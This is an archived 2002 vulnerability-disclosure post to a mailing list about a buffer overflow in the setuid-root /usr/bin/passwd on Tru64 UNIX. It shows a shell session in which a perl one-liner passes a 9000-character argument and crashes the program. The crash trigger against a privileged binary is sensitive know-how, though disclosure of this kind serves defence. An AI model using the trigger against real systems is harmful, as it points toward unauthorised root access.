Vulnerability Development mailing list archives

TRU64 /usr/bin/passwd overflow


From: KF <dotslash () snosoft com>
Date: Mon, 20 May 2002 22:55:40 -0400

In light of the recent conversations on the non-executable stack I have decided to release some of the information I have been sitting on.

alpha.snosoft.com> uname -a
OSF1 alpha.snosoft.com V5.1 732 alpha
alpha.snosoft.com> id
uid=201(dotslash) gid=15(users) groups=0(system)
alpha.snosoft.com> ls -al /usr/bin/passwd
-rwsr-xr-x   3 root     bin        32944 Aug 24  2000 /usr/bin/passwd
alpha.snosoft.com> /usr/bin/passwd `perl -e 'print "A" x 9000'`
Memory fault

-KF



Current thread: